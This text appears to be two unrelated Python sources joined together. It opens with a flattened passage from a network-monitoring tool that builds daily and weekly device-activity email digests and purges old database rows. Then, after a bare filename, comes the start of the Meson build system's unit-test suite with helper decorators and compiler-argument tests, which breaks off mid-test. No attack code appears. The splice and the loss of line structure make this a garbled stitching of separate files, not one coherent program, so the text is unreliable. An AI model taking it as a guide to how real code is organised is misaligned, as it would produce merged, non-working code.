# it's not yet time to send this digest continue # time to send a digest ng.debugger.info("Sending %s digest", (digest,)) ng.db.set_state(timestamp_string, future_digest_timestamp) # how many devices were requested during this time period ng.db.cursor.execute("SELECT COUNT(DISTINCT dst_ip) FROM arp WHERE rid IS NOT NULL AND timestamp >= ? AND timestamp <= ?", (time_period, now)) requested = ng.db.cursor.fetchone() # all devices that were actively seen during this time period ng.db.cursor.execute("SELECT DISTINCT did FROM arp WHERE did IS NOT NULL AND timestamp >= ? AND timestamp <= ?", (time_period, now)) seen = ng.db.cursor.fetchall() # all devices that were actively seen during the previous time period ng.db.cursor.execute("SELECT DISTINCT did FROM arp WHERE did IS NOT NULL AND timestamp >= ? 
AND timestamp <= ?", (previous_time_period, time_period)) seen_previous = ng.db.cursor.fetchall() new = set(seen) - set(seen_previous) gone_away = set(seen_previous) - set(seen) noisy = [] some_new = False active_devices = [] for unique_seen in seen: did = unique_seen[0] details = get_details(did) if not details: ng.debugger.warning("invalid device %d, not included in digest") continue active, counter, ip, mac, host_name, custom_name, vendor = details ng.db.cursor.execute("SELECT COUNT(DISTINCT(dst_ip)) FROM arp WHERE rid IS NOT NULL AND src_ip = ? AND timestamp >= ? AND timestamp <= ?", (ip, time_period, now)) requests = ng.db.cursor.fetchone() if requests[0] > 10: noisy.append((mac, ip, requests[0], pretty.name_did(did))) if unique_seen in new: active_devices.append("""%s (%s)*""" % (pretty.name_did(did), ip)) some_new = True else: active_devices.append("""%s (%s)""" % (pretty.name_did(did), ip)) if some_new: new_devices_text = "* = not active in the previous " + time_period_description else: new_devices_text = "" noisy_devices_intro = "" noisy_devices = [] if noisy: noisy_devices_intro = "The following devices requested 10 or more IPs:" for noise in noisy: noisy_text = """%s (%s) requested %d IP addresses""" % (noise[3], noise[1], noise[2]) if noise[2] > 100: noisy_text += " (network scan)" elif noise[2] > 50: noisy_text += " (network scan?)" noisy_devices.append(noisy_text) gone_devices_intro = "" gone_devices = [] if gone_away: gone_devices_intro = """The following IPs were not active, but were active the previous %s:""" % time_period_description for gone in gone_away: gone_details = get_details(gone[0]) gone_active, gone_counter, gone_ip, gone_mac, gone_host_name, gone_custom_name, gone_vendor = gone_details gone_devices.append("""%s (%s)""" % (pretty.name_did(gone[0]), gone_ip)) device_breakdown = [] if digest == "daily": rnge = 24 while rnge > 0: lower = now - datetime.timedelta(hours=rnge) rnge = rnge - 1 upper = now - datetime.timedelta(hours=rnge) ng.db.cursor.execute("SELECT DISTINCT did FROM arp WHERE timestamp >= ? AND timestamp < ?", (lower, upper)) distinct = ng.db.cursor.fetchall() device_breakdown.append("""%s: %d""" % (lower.strftime("%I %p, %x"), len(distinct))) elif digest == "weekly": rnge = 7 while rnge > 0: lower = now - datetime.timedelta(days=rnge) rnge = rnge - 1 upper = now - datetime.timedelta(days=rnge) ng.db.cursor.execute("SELECT DISTINCT did FROM arp WHERE timestamp >= ? AND timestamp < ?", (lower, upper)) distinct = ng.db.cursor.fetchall() device_breakdown.append("""%s: %d""" % (lower.strftime("%A, %x"), len(distinct))) ng.debugger.info("Sending %s digest", (digest,)) # @TODO fixme email.MailSend('digest', 'digest', dict( type=digest, time_period=time_period_description, active_devices_count=len(seen), active_devices=active_devices, new_devices_text=new_devices_text, ips_requested=requested[0], noisy_devices_intro=noisy_devices_intro, noisy_devices=noisy_devices, gone_devices_intro=gone_devices_intro, gone_devices=gone_devices, device_breakdown=device_breakdown )) except Exception: ng.debugger.dump_exception("send_email_digests() caught exception") # Don't let the arp or event tables grow too big. 
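# Rows older than database["oldest_arp"] / database["oldest_event"] are purged, at most once per day.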
def garbage_collection():
    ng = netgrasp_instance

    try:
        ng.debugger.debug("entering garbage_collection()")
        if not ng.database["gcenabled"]:
            ng.debugger.debug("garbage collection disabled")
            return

        garbage_collection_string = "garbage collection"

        now = datetime.datetime.now()
        next_garbage_collection = ng.db.get_state(garbage_collection_string, "", True)

        if not next_garbage_collection:
            # perform first garbage collection now
            next_garbage_collection = now

        if now < next_garbage_collection:
            # it's not yet time to perform garbage collection
            return False

        ng.debugger.info("performing garbage collection")
        # schedule next garbage collection
        ng.db.set_state(garbage_collection_string, now + datetime.timedelta(days=1))

        with exclusive_lock.ExclusiveFileLock(ng, 5, "garbage_collection"):
            # Purge old arp entries.
            ng.db.cursor.execute("SELECT COUNT(*) FROM arp WHERE timestamp < ?", (now - ng.database["oldest_arp"],))
            arp_count = ng.db.cursor.fetchone()
            ng.db.cursor.execute("DELETE FROM arp WHERE timestamp < ?", (now - ng.database["oldest_arp"],))
            # Purge old event entries.
            ng.db.cursor.execute("SELECT COUNT(*) FROM event WHERE timestamp < ?", (now - ng.database["oldest_event"],))
            event_count = ng.db.cursor.fetchone()
            ng.db.cursor.execute("DELETE FROM event WHERE timestamp < ?", (now - ng.database["oldest_event"],))
            ng.db.connection.commit()
        ng.debugger.debug("deleted %d arp entries older than %s", (arp_count[0], now - ng.database["oldest_arp"]))
        ng.debugger.debug("deleted %d event entries older than %s", (event_count[0], now - ng.database["oldest_event"]))

    except Exception:
        ng.debugger.dump_exception("garbage_collection() caught exception")
run_unittests.py
#!/usr/bin/env python3 # Copyright 2016-2017 The Meson development team # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from mesonbuild.compilers.objc import AppleClangObjCCompiler import time import stat import subprocess import re import json import tempfile import textwrap import os import shutil import sys import unittest import platform import pickle import functools import io import operator import threading import urllib.error import urllib.request import zipfile import hashlib from itertools import chain from unittest import mock from configparser import ConfigParser from contextlib import contextmanager from glob import glob from pathlib import (PurePath, Path) from distutils.dir_util import copy_tree import typing as T import mesonbuild.mlog import mesonbuild.depfile import mesonbuild.dependencies.base import mesonbuild.compilers import mesonbuild.envconfig import mesonbuild.environment import mesonbuild.mesonlib import mesonbuild.coredata import mesonbuild.modules.gnome from mesonbuild.interpreter import Interpreter, ObjectHolder from mesonbuild.ast import AstInterpreter from mesonbuild.mesonlib import ( BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows, is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos, windows_proof_rmtree, python_command, version_compare, split_args, quote_arg, relpath, is_linux, git, GIT ) from mesonbuild.environment import detect_ninja from mesonbuild.mesonlib import MesonException, EnvironmentException from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram import mesonbuild.dependencies.base from mesonbuild.build import Target, ConfigurationData import mesonbuild.modules.pkgconfig from mesonbuild.mtest import TAPParser, TestResult from mesonbuild.wrap.wrap import PackageDefinition, WrapException from run_tests import ( Backend, FakeBuild, FakeCompilerOptions, ensure_backend_detects_changes, exe_suffix, get_backend_commands, get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script, run_configure_inprocess, run_mtest_inprocess ) URLOPEN_TIMEOUT = 5 @contextmanager def chdir(path: str): curdir = os.getcwd() os.chdir(path) try: yield finally: os.chdir(curdir) def get_dynamic_section_entry(fname: str, entry: str) -> T.Optional[str]: if is_cygwin() or is_osx(): raise unittest.SkipTest('Test only applicable to ELF platforms') try: raw_out = subprocess.check_output(['readelf', '-d', fname], universal_newlines=True) except FileNotFoundError: # FIXME: Try using depfixer.py:Elf() as a fallback raise unittest.SkipTest('readelf not found') pattern = re.compile(entry + r': \[(.*?)\]') for line in raw_out.split('\n'): m = pattern.search(line) if m is not None: return str(m.group(1)) return None # The file did not contain the specified entry. 
def get_soname(fname: str) -> T.Optional[str]: return get_dynamic_section_entry(fname, 'soname') def get_rpath(fname: str) -> T.Optional[str]: raw = get_dynamic_section_entry(fname, r'(?:rpath|runpath)') # Get both '' and None here if not raw: return None # nix/nixos adds a bunch of stuff to the rpath out of necessity that we # don't check for, so clear those final = ':'.join([e for e in raw.split(':') if not e.startswith('/nix')]) return final def is_tarball(): if not os.path.isdir('docs'): return True return False def is_ci(): if 'CI' in os.environ: return True return False def _git_init(project_dir): # If a user has git configuration init.defaultBranch set we want to override that with tempfile.TemporaryDirectory() as d: out = git(['--version'], str(d))[1] if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'): extra_cmd = ['--initial-branch', 'master'] else: extra_cmd = [] subprocess.check_call(['git', 'init'] + extra_cmd, cwd=project_dir, stdout=subprocess.DEVNULL) subprocess.check_call(['git', 'config', 'user.name', 'Author Person'], cwd=project_dir) subprocess.check_call(['git', 'config', 'user.email', 'teh_coderz@example.com'], cwd=project_dir) subprocess.check_call('git add *', cwd=project_dir, shell=True, stdout=subprocess.DEVNULL) subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir, stdout=subprocess.DEVNULL) @functools.lru_cache() def is_real_gnu_compiler(path): ''' Check if the gcc we have is a real gcc and not a macOS wrapper around clang ''' if not path: return False out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT) return 'Free Software Foundation' in out def skipIfNoExecutable(exename): ''' Skip this test if the given executable is not found. ''' def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): if shutil.which(exename) is None: raise unittest.SkipTest(exename + ' not found') return func(*args, **kwargs) return wrapped return wrapper def skipIfNoPkgconfig(f): ''' Skip this test if no pkg-config is found, unless we're on CI. This allows users to run our test suite without having pkg-config installed on, f.ex., macOS, while ensuring that our CI does not silently skip the test because of misconfiguration. Note: Yes, we provide pkg-config even while running Windows CI ''' @functools.wraps(f) def wrapped(*args, **kwargs): if not is_ci() and shutil.which('pkg-config') is None: raise unittest.SkipTest('pkg-config not found') return f(*args, **kwargs) return wrapped def skipIfNoPkgconfigDep(depname): ''' Skip this test if the given pkg-config dep is not found, unless we're on CI. ''' def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): if not is_ci() and shutil.which('pkg-config') is None: raise unittest.SkipTest('pkg-config not found') if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0: raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname)) return func(*args, **kwargs) return wrapped return wrapper def skip_if_no_cmake(f): ''' Skip this test if no cmake is found, unless we're on CI. This allows users to run our test suite without having cmake installed on, f.ex., macOS, while ensuring that our CI does not silently skip the test because of misconfiguration. 
''' @functools.wraps(f) def wrapped(*args, **kwargs): if not is_ci() and shutil.which('cmake') is None: raise unittest.SkipTest('cmake not found') return f(*args, **kwargs) return wrapped def skip_if_not_language(lang): def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): try: env = get_fake_env() f = getattr(env, 'detect_{}_compiler'.format(lang)) f(MachineChoice.HOST) except EnvironmentException: raise unittest.SkipTest('No {} compiler found.'.format(lang)) return func(*args, **kwargs) return wrapped return wrapper def skip_if_env_set(key): ''' Skip a test if a particular env is set, except when running under CI ''' def wrapper(func): @functools.wraps(func) def wrapped(*args, **kwargs): old = None if key in os.environ: if not is_ci(): raise unittest.SkipTest('Env var {!r} set, skipping'.format(key)) old = os.environ.pop(key) try: return func(*args, **kwargs) finally: if old is not None: os.environ[key] = old return wrapped return wrapper def skip_if_not_base_option(feature): """Skip tests if The compiler does not support a given base option. for example, ICC doesn't currently support b_sanitize. """ def actual(f): @functools.wraps(f) def wrapped(*args, **kwargs): env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) if feature not in cc.base_options: raise unittest.SkipTest( '{} not available with {}'.format(feature, cc.id)) return f(*args, **kwargs) return wrapped return actual @contextmanager def temp_filename(): '''A context manager which provides a filename to an empty temporary file. On exit the file will be deleted. ''' fd, filename = tempfile.mkstemp() os.close(fd) try: yield filename finally: try: os.remove(filename) except OSError: pass @contextmanager def no_pkgconfig(): ''' A context manager that overrides shutil.which and ExternalProgram to force them to return None for pkg-config to simulate it not existing. 
''' old_which = shutil.which old_search = ExternalProgram._search def new_search(self, name, search_dir): if name == 'pkg-config': return [None] return old_search(self, name, search_dir) def new_which(cmd, *kwargs): if cmd == 'pkg-config': return None return old_which(cmd, *kwargs) shutil.which = new_which ExternalProgram._search = new_search try: yield finally: shutil.which = old_which ExternalProgram._search = old_search class InternalTests(unittest.TestCase): def test_version_number(self): searchfunc = mesonbuild.environment.search_version self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3') self.assertEqual(searchfunc('1.2.3'), '1.2.3') self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3') self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128') self.assertEqual(searchfunc('2016.10.128'), '2016.10.128') self.assertEqual(searchfunc('2016.10'), '2016.10') self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3') self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.x'), 'unknown version') def test_mode_symbolic_to_bits(self): modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits self.assertEqual(modefunc('---------'), 0) self.assertEqual(modefunc('r--------'), stat.S_IRUSR) self.assertEqual(modefunc('---r-----'), stat.S_IRGRP) self.assertEqual(modefunc('------r--'), stat.S_IROTH) self.assertEqual(modefunc('-w-------'), stat.S_IWUSR) self.assertEqual(modefunc('----w----'), stat.S_IWGRP) self.assertEqual(modefunc('-------w-'), stat.S_IWOTH) self.assertEqual(modefunc('--x------'), stat.S_IXUSR) self.assertEqual(modefunc('-----x---'), stat.S_IXGRP) self.assertEqual(modefunc('--------x'), stat.S_IXOTH) self.assertEqual(modefunc('--S------'), stat.S_ISUID) self.assertEqual(modefunc('-----S---'), stat.S_ISGID) self.assertEqual(modefunc('--------T'), stat.S_ISVTX) self.assertEqual(modefunc('--s------'), stat.S_ISUID | stat.S_IXUSR) self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP) self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH) self.assertEqual(modefunc('rwx------'), stat.S_IRWXU) self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG) self.assertEqual(modefunc('------rwx'), stat.S_IRWXO) # We could keep listing combinations exhaustively but that seems # tedious and pointless. Just test a few more. 
self.assertEqual(modefunc('rwxr-xr-x'), stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH) self.assertEqual(modefunc('rw-r--r--'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH) self.assertEqual(modefunc('rwsr-x---'), stat.S_IRWXU | stat.S_ISUID | stat.S_IRGRP | stat.S_IXGRP) def test_compiler_args_class_none_flush(self): cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock()) a = cc.compiler_args(['-I.']) #first we are checking if the tree construction deduplicates the correct -I argument a += ['-I..'] a += ['-I./tests/'] a += ['-I./tests2/'] #think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes: # assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.']) a += ['-I.'] a += ['-I.', '-I./tests/'] self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..']) #then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one a += ['-I.', '-I./tests2/'] self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..']) def test_compiler_args_class_d(self): d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch') # check include order is kept when deduplicating a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird']) a += ['-Ifirst'] self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird']) def test_compiler_args_class_clike(self): cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock()) # Test that empty initialization works a = cc.compiler_args() self.assertEqual(a, []) # Test that list initialization works a = cc.compiler_args(['-I.', '-I..']) self.assertEqual(a, ['-I.', '-I..']) # Test that there is no de-dup on initialization self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.']) ## Test that appending works a.append('-I..') self.assertEqual(a, ['-I..', '-I.']) a.append('-O3') self.assertEqual(a, ['-I..', '-I.', '-O3']) ## Test that in-place addition works a += ['-O2', '-O2'] self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2']) # Test that removal works a.remove('-O2') self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2']) # Test that de-dup happens on addition a += ['-Ifoo', '-Ifoo'] self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2']) # .extend() is just +=, so we don't test it ## Test that addition works # Test that adding a list with just one old arg works and yields the same array a = a + ['-Ifoo'] self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2']) # Test that adding a list with one arg new and one old works a = a + ['-Ifoo', '-Ibaz'] self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2']) # Test that adding args that must be prepended and appended works a = a + ['-Ibar', '-Wall'] self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall']) ## Test that reflected addition works # Test that adding to a list with just one old arg works and yields the same array a = ['-Ifoo'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall']) # Test that adding to a list with just one new arg that is not pre-pended works a = ['-Werror'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall']) # Test that adding to a list with two new args preserves the order a = ['-Ldir', '-Lbah'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', 
'-Wall']) # Test that adding to a list with old args does nothing a = ['-Ibar', '-Ibaz', '-Ifoo'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall']) ## Test that adding libraries works l = cc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l, ['-Lfoodir', '-lfoo']) # Adding a library and a libpath appends both correctly l += ['-Lbardir', '-lbar'] self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar']) # Adding the same library again does nothing l += ['-lbar'] self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar']) ## Test that 'direct' append and extend works l = cc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l, ['-Lfoodir', '-lfoo']) # Direct-adding a library and a libpath appends both correctly l.extend_direct(['-Lbardir', '-lbar']) self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar']) # Direct-adding the same library again still adds it l.append_direct('-lbar') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar']) # Direct-adding with absolute path deduplicates l.append_direct('/libbaz.a') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a']) # Adding libbaz again does nothing l.append_direct('/libbaz.a') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a']) def test_compiler_args_class_gnuld(self): ## Test --start/end-group linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', []) gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker) ## Ensure that the fake compiler is never called by overriding the relevant function gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include'] ## Test that 'direct' append and extend works l = gcc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group']) # Direct-adding a library and a libpath appends both correctly l.extend_direct(['-Lbardir', '-lbar']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group']) # Direct-adding the same library again still adds it l.append_direct('-lbar') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group']) # Direct-adding with absolute path deduplicates l.append_direct('/libbaz.a') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group']) # Adding libbaz again does nothing l.append_direct('/libbaz.a') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group']) # Adding a non-library argument doesn't include it in the group l += ['-Lfoo', '-Wl,--export-dynamic'] self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic']) # -Wl,-lfoo is detected as a library and gets added to the group l.append('-Wl,-ldl') self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group']) def test_compiler_args_remove_system(self): ## Test --start/end-group linker = 
mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', []) gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker) ## Ensure that the fake compiler is never called by overriding the relevant function gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include'] ## Test that 'direct' append and extend works l = gcc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group']) ## Test that to_native removes all system includes l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include'] self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1']) def test_string_templates_substitution(self): dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict substfunc = mesonbuild.mesonlib.substitute_values ME = mesonbuild.mesonlib.MesonException # Identity self.assertEqual(dictfunc([], []), {}) # One input, no outputs inputs = ['bar/foo.c.in'] outputs = [] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:]) cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:]) cmd = ['@INPUT@', '@BASENAME@.hah', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:]) cmd = ['@OUTPUT@'] self.assertRaises(ME, substfunc, cmd, d) # One input, one output inputs = ['bar/foo.c.in'] outputs = ['out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c', '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@.out', '@OUTPUT@', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + outputs + cmd[2:]) cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', '@OUTPUT0@'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', d['@PLAINNAME@'] + '.ok'] + outputs) cmd = ['@INPUT@', '@BASENAME@.hah', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:]) # One input, one output with a subdir outputs = ['dir/out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c', '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Two inputs, no outputs inputs = ['bar/foo.c.in', 'baz/foo.c.in'] outputs = [] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1]} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + cmd[1:]) cmd = ['@INPUT0@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:]) cmd = 
['@INPUT0@.out', '@INPUT1@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:]) cmd = ['@INPUT0@', '@INPUT1@', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + cmd[2:]) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Too many inputs cmd = ['@PLAINNAME@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@BASENAME@'] self.assertRaises(ME, substfunc, cmd, d) # No outputs cmd = ['@OUTPUT@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@OUTPUT0@'] self.assertRaises(ME, substfunc, cmd, d) cmd = ['@OUTDIR@'] self.assertRaises(ME, substfunc, cmd, d) # Two inputs, one output outputs = ['dir/out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1], '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@OUTPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[1:]) cmd = ['@OUTPUT@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out'] + cmd[1:]) cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok'] + cmd[2:]) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough outputs cmd = ['@OUTPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Two inputs, two outputs outputs = ['dir/out.c', 'dir/out2.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@INPUT1@': inputs[1], '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTPUT1@': outputs[1], '@OUTDIR@': 'dir'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@OUTPUT@', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[1:]) cmd = ['@OUTPUT0@', '@OUTPUT1@', 'strings'] self.assertEqual(substfunc(cmd, d), outputs + cmd[2:]) cmd = ['@OUTPUT0@.out', '@INPUT1@.ok', '@OUTDIR@'] self.assertEqual(substfunc(cmd, d), [outputs[0] + '.out', inputs[1] + '.ok', 'dir']) # Many inputs, can't use @INPUT@ like this cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough inputs cmd = ['@INPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Not enough outputs cmd = ['@OUTPUT2@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) # Many outputs, can't use @OUTPUT@ like this cmd = ['@OUTPUT@.out', 'ordinary', 'strings'] self.assertRaises(ME, substfunc, cmd, d) def test_needs_exe_wrapper_override(self): config = ConfigParser() config['binaries'] = { 'c': '\'/usr/bin/gcc\'', } config['host_machine'] = { 'system': '\'linux\'', 'cpu_family': '\'arm\'', 'cpu': '\'armv7\'', 'endian': '\'little\'', } # Can not be used as context manager because we need to # open it a second time and this is not possible on # Windows. 
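        # As an illustration (values below are already quoted Meson literals),
        # the cross file written out by ConfigParser ends up looking roughly like:
        #   [binaries]
        #   c = '/usr/bin/gcc'
        #   [host_machine]
        #   system = 'linux'
        #   cpu_family = 'arm'
        #   cpu = 'armv7'
        #   endian = 'little'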
